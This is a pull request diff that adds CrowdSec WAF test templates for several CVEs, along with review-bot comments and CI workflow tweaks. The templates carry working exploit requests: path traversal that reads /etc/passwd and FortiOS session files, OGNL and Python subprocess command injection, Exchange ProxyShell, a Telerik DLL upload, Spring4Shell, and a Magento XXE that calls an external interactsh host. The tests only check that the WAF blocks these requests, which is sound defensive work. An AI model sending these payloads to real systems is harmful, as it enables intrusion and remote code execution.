Multiples CVEs #1111

Merged
merged 23 commits into from
Sep 12, 2024
Changes from 21 commits
9 changes: 2 additions & 7 deletions .appsec-tests/CVE-2022-22965/CVE-2022-22965.yaml
Original file line number Diff line number Diff line change
Expand Up @@ -11,14 +11,9 @@ http:
POST {{BaseURL}} HTTP/1.1
Content-Type: application/x-www-form-urlencoded

class.module.classLoader.resources.context.configFile={{interact_protocol}}://{{interactsh-url}}&class.module.classLoader.resources.context.configFile.content.aaa=xxx
class.module.classLoader.resources.context.configFile=http://foobar/x&class.module.classLoader.resources.context.configFile.content.aaa=xxx
- |
GET /?class.module.classLoader.resources.context.configFile={{interact_protocol}}://{{interactsh-url}}&class.module.classLoader.resources.context.configFile.content.aaa=xxx HTTP/1.1
payloads:
interact_protocol:
- "http"
- https

GET /?class.module.classLoader.resources.context.configFile=http://foobar/x&class.module.classLoader.resources.context.configFile.content.aaa=xxx HTTP/1.1
cookie-reuse: true
matchers:
- type: dsl
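Review bot: With the `payloads:` block removed, both raw requests now send only `configFile=http://foobar/x`, so the `https` variant the old template iterated over is no longer exercised. If the rule keys on the `class.module.classLoader` parameter name rather than on the scheme of the value, that is fine, but say so in a comment; otherwise keep an `https://foobar/x` request so coverage does not shrink silently. The matchers are outside the visible lines, so also check that nothing there still expects an interactsh interaction.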
5 changes: 5 additions & 0 deletions .appsec-tests/vpatch-CVE-2018-13379/config.yaml
@@ -0,0 +1,5 @@

appsec-rules:
- ./appsec-rules/crowdsecurity/base-config.yaml
- ./appsec-rules/crowdsecurity/vpatch-CVE-2018-13379.yaml
nuclei_template: test-CVE-2018-13379.yaml
20 changes: 20 additions & 0 deletions .appsec-tests/vpatch-CVE-2018-13379/test-CVE-2018-13379.yaml
@@ -0,0 +1,20 @@

id: test-CVE-2018-13379
info:
name: test-CVE-2018-13379
author: crowdsec
severity: info
description: test-CVE-2018-13379 testing
tags: appsec-testing
http:
- raw:
- |
GET /remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers:
- type: dsl
condition: and
dsl:
- "status_code_1 == 403"
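Review bot: The only request in this template is the one that must be blocked (`lang=/../../../..//////////dev/cmdb/sslvpn_websession`), so the test passes just as well if the rule returns 403 for every `/remote/fgt_lang` request. If the test backend answers that path, add a second request with a benign `lang` value and assert that its status is not 403, so an over-broad rule fails the test.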

5 changes: 5 additions & 0 deletions .appsec-tests/vpatch-CVE-2019-18935/config.yaml
@@ -0,0 +1,5 @@

appsec-rules:
- ./appsec-rules/crowdsecurity/base-config.yaml
- ./appsec-rules/crowdsecurity/vpatch-CVE-2019-18935.yaml
nuclei_template: test-CVE-2019-18935.yaml
48 changes: 48 additions & 0 deletions .appsec-tests/vpatch-CVE-2019-18935/test-CVE-2019-18935.yaml
@@ -0,0 +1,48 @@

id: test-CVE-2019-18935
info:
name: test-CVE-2019-18935
author: crowdsec
severity: info
description: test-CVE-2019-18935 testing
tags: appsec-testing
http:
- raw:
- |
POST /Telerik.Web.UI.WebResource.axd?type=rau HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=93350a62d5c3664b3c206e59a6239bdc

--93350a62d5c3664b3c206e59a6239bdc
Content-Disposition: form-data; name="rauPostData"

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&6R/cGaqQeHVAzdJ9wTFOyCsrMSTtqcjLe8AHwiPckPDUwecnJyNlkDYwDQpxGYQ9hs6YxhupK310sbCbtXB4H6Dz5rGNL40nkkyo4j2clmRr08jtFsPQ0RpE5BGsulPT3l0MxyAvPFMs8bMybUyAP+9RB9LoHE3Xo8BqDadX3HT1WFL4XVDQYdEAzeZHzRhIIqYqDJzJhlFZuQVQcmxxFZjrQHDv9UDm9pqpxf3U+94yYdjW9ZD5qIG0IxM/1yEtAZ7NODZhEBIhJHKLgS0XICzWydvoRhmDnIDQl907yq3y4LfOgi/Y0Q2+cCxzKEb9cpNPCFehqRU8sZKmvxzU2AF8RruYXW+Z9pB1j4gBq8w=
--93350a62d5c3664b3c206e59a6239bdc
Content-Disposition: form-data; name="file"; filename="1576142987.918625.dll"
Content-Type: application/octet-stream
<DDL_CONTENT>
--93350a62d5c3664b3c206e59a6239bdc
Content-Disposition: form-data; name="fileName"

1576142987.918625.dll
--93350a62d5c3664b3c206e59a6239bdc
Content-Disposition: form-data; name="contentType"

application/octet-stream
--93350a62d5c3664b3c206e59a6239bdc
Content-Disposition: form-data; name="lastModifiedDate"

1970-01-01T00:00:00.000Z
--93350a62d5c3664b3c206e59a6239bdc
Content-Disposition: form-data; name="metadata"

{"TotalChunks": 1, "ChunkIndex": 0, "TotalFileSize": 1, "UploadID": "1576142987.918625.dll"}
--93350a62d5c3664b3c206e59a6239bdc--

cookie-reuse: true
matchers:
- type: dsl
condition: and
dsl:
- "status_code_1 == 403"
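Review bot: In the `file` part, `Content-Type: application/octet-stream` is followed directly by `<DDL_CONTENT>` with no empty line, unlike every other part of this body, so a multipart parser may treat the placeholder as a header line instead of the part's content. Insert the blank separator line, and rename the placeholder to `<DLL_CONTENT>` if that is what was meant (the filename is `1576142987.918625.dll`).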

5 changes: 5 additions & 0 deletions .appsec-tests/vpatch-CVE-2020-5902/config.yaml
@@ -0,0 +1,5 @@

appsec-rules:
- ./appsec-rules/crowdsecurity/base-config.yaml
- ./appsec-rules/crowdsecurity/vpatch-CVE-2020-5902.yaml
nuclei_template: test-CVE-2020-5902.yaml
20 changes: 20 additions & 0 deletions .appsec-tests/vpatch-CVE-2020-5902/test-CVE-2020-5902.yaml
@@ -0,0 +1,20 @@

id: test-CVE-2020-5902
info:
name: test-CVE-2020-5902
author: crowdsec
severity: info
description: test-CVE-2020-5902 testing
tags: appsec-testing
http:
- raw:
- |
GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers:
- type: dsl
condition: and
dsl:
- "status_code_1 == 403"
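Review bot: `cookie-reuse: true` and `condition: and` do nothing here, since there is a single raw request and a single DSL expression (`status_code_1 == 403`). The same two lines are repeated in the other single-request templates added in this PR; dropping them keeps each template to what the test actually checks. `description: test-CVE-2020-5902 testing` also just repeats the id; one sentence on what the rule is expected to block would help whoever debugs a failing run.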

5 changes: 5 additions & 0 deletions .appsec-tests/vpatch-CVE-2022-26134/config.yaml
@@ -0,0 +1,5 @@

appsec-rules:
- ./appsec-rules/crowdsecurity/base-config.yaml
- ./appsec-rules/crowdsecurity/vpatch-CVE-2022-26134.yaml
nuclei_template: test-CVE-2022-26134.yaml
20 changes: 20 additions & 0 deletions .appsec-tests/vpatch-CVE-2022-26134/test-CVE-2022-26134.yaml
@@ -0,0 +1,20 @@

id: test-CVE-2022-26134
info:
name: test-CVE-2022-26134
author: crowdsec
severity: info
description: test-CVE-2022-26134 testing
tags: appsec-testing
http:
- raw:
- |
GET /%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/ HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers:
- type: dsl
condition: and
dsl:
- "status_code_1 == 403"

5 changes: 5 additions & 0 deletions .appsec-tests/vpatch-CVE-2022-41082/config.yaml
@@ -0,0 +1,5 @@

appsec-rules:
- ./appsec-rules/crowdsecurity/base-config.yaml
- ./appsec-rules/crowdsecurity/vpatch-CVE-2022-41082.yaml
nuclei_template: test-CVE-2022-41082.yaml
22 changes: 22 additions & 0 deletions .appsec-tests/vpatch-CVE-2022-41082/test-CVE-2022-41082.yaml
@@ -0,0 +1,22 @@

id: test-CVE-2022-41082
info:
name: test-CVE-2022-41082
author: crowdsec
severity: info
description: test-CVE-2022-41082 testing
tags: appsec-testing
http:
- raw:
- |
GET /autodiscover/autodiscover.json?@zdi/PowerShell?serializationLevel=Full;ExchClientVer=15.2.922.7;clientApplication=ManagementShell;TargetServer=;PSVersion=5.1.17763.592&Email=autodiscover/autodiscover.json%3F@zdi HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
cookie-reuse: true
matchers:
- type: dsl
condition: and
dsl:
- "status_code_1 == 403"
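Review bot: The request sets `Content-Type: application/x-www-form-urlencoded` on a `GET` that carries no body. If the vpatch rule does not depend on that header, drop it so the test shows the minimal request that must be blocked; if it does depend on it, note that in the rule's description.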


5 changes: 5 additions & 0 deletions .appsec-tests/vpatch-CVE-2024-29973/config.yaml
@@ -0,0 +1,5 @@

appsec-rules:
- ./appsec-rules/crowdsecurity/base-config.yaml
- ./appsec-rules/crowdsecurity/vpatch-CVE-2024-29973.yaml
nuclei_template: test-CVE-2024-29973.yaml
32 changes: 32 additions & 0 deletions .appsec-tests/vpatch-CVE-2024-29973/test-CVE-2024-29973.yaml
@@ -0,0 +1,32 @@
id: test-CVE-2024-29973
info:
name: test-CVE-2024-29973
author: crowdsec
severity: info
description: test-CVE-2024-29973 testing
tags: appsec-testing
variables:
string: "{{randstr}}"

http:
- raw:
- |
POST /cmd,/simZysh/register_main/setCookie HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei

------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; name="c0"

storage_ext_cgi CGIGetExtStoInfo None) and False or __import__("subprocess").check_output("echo {{string}}", shell=True)#
------WebKitFormBoundarygcflwtei--
- |
GET /cmd,/simZysh/register_main/setCookie?c0=storage_ext_cgi+CGIGetExtStoInfo+None)+"+"and+False+or+__import__(\"subprocess\").check_output(\"id\",+shell=True)%23 HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers:
- type: dsl
condition: and
dsl:
- "status_code_1 == 403"
- "status_code_2 == 403"
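Review bot: The second request sits inside a `|` literal block, where YAML does not process escapes, so `\"subprocess\"` and `\"id\"` are sent with the backslashes in place, and the `"+"` after `None)` has no counterpart in the POST body. If the GET is meant to carry the same `c0` value as the POST, remove the backslashes and the extra `"+"`; if the rule only matches on the path and the presence of `c0`, a comment saying so would explain why the two payloads differ. The GET also hard-codes `id` while the POST uses `{{string}}`, which leaves the `variables:` entry used in only one of the two requests.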
5 changes: 5 additions & 0 deletions .appsec-tests/vpatch-CVE-2024-34102/config.yaml
@@ -0,0 +1,5 @@

appsec-rules:
- ./appsec-rules/crowdsecurity/base-config.yaml
- ./appsec-rules/crowdsecurity/vpatch-CVE-2024-34102.yaml
nuclei_template: test-CVE-2024-34102.yaml
31 changes: 31 additions & 0 deletions .appsec-tests/vpatch-CVE-2024-34102/test-CVE-2024-34102.yaml
@@ -0,0 +1,31 @@

id: test-CVE-2024-34102
info:
name: test-CVE-2024-34102
author: crowdsec
severity: info
description: test-CVE-2024-34102 testing
tags: appsec-testing
http:
- raw:
- |
POST /rest/V1/guest-carts/1/estimate-shipping-methods/2 HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json

{"address":{"totalsCollector":{"collectorList":{"totalCollector":{"sourceData":{"data":"<?xml version='1.0' ?> <!DOCTYPE r [ <!ELEMENT r ANY > <!ENTITY % sp SYSTEM 'http://{{interactsh-url}}'> %sp; %param1; ]> <r>&exfil;</r>","options": 16}}}}}}
- |
POST /rest/V1/guest-carts/1/estimate-shipping-methods/3 HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json

{"address":{"totalsCollector":{"collectorList":{"totalCollector":{"sourceData":{"data":"http://{{interactsh-url}}/xxe.xml","dataIsURL":true,"options":12345678}}}}}}
cookie-reuse: true
matchers:
- type: dsl
condition: and
dsl:
- "status_code_1 == 403"
- "status_code_2 == 403"
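Review bot: Both request bodies still use `{{interactsh-url}}`, while the CVE-2022-22965 test in this same PR replaces that placeholder with the static `http://foobar/x`. The matchers here only check `status_code_1 == 403` and `status_code_2 == 403`, so no callback is ever inspected; use a static URL in both bodies for consistency, so the test does not depend on an interactsh server being reachable from CI.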


6 changes: 3 additions & 3 deletions .github/workflows/test_appsec_rules.yaml
Expand Up @@ -25,7 +25,7 @@ concurrency:

jobs:
run-appsec-rules-tests:
runs-on: ubuntu-20.04
runs-on: ubuntu-22.04
steps:
- name: Check out code into the Go module directory
uses: actions/checkout@v4
Expand All @@ -48,7 +48,7 @@ jobs:
sudo cscli bouncers add hubtestAppsec -k "this_is_a_bad_password"
- name: Start OpenResty Container
run: |
docker-compose -f docker/appsec/docker-compose.yaml up -d --build
docker compose -f docker/appsec/docker-compose.yaml up -d --build
- name: run tests on last crowdsec tag
run: |
cscli hubtest run --all --appsec --debug --target http://127.0.0.1:7822
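Review bot: `docker compose ... up -d --build` returns as soon as the containers are started, and the next step runs `cscli hubtest run ... --target http://127.0.0.1:7822` immediately. `waf-check.yaml` at least has `sleep 3` after the same command; here there is nothing. Add a readiness wait (a short retry loop against the target, or a healthcheck in the compose file combined with `up --wait`) so a slow build does not show up as failing rule tests.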
Expand All @@ -67,5 +67,5 @@ jobs:
color: ${{ env.APPSEC_RULE_BADGE_COLOR }}
- name: Stop containers
if: always()
run: docker-compose -f docker/appsec/docker-compose.yaml down
run: docker compose -f docker/appsec/docker-compose.yaml down

2 changes: 1 addition & 1 deletion .github/workflows/waf-check.yaml
Expand Up @@ -85,7 +85,7 @@ jobs:
sudo cscli bouncers add hubtestAppsec -k "this_is_a_bad_password"
- name: Start OpenResty Container
run: |
docker-compose -f docker/appsec/docker-compose.yaml up -d --build
docker compose -f docker/appsec/docker-compose.yaml up -d --build
sleep 3
- name: Build and Run Waf Check
run: |
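Review bot: This job switches to `docker compose`, but its `runs-on` is not part of the hunk, whereas `test_appsec_rules.yaml` moves to `ubuntu-22.04` in the same PR. Check that this job's runner image also provides the Compose v2 plugin. The fixed `sleep 3` that follows is also fragile with `--build`; a check that the container actually answers would be more reliable.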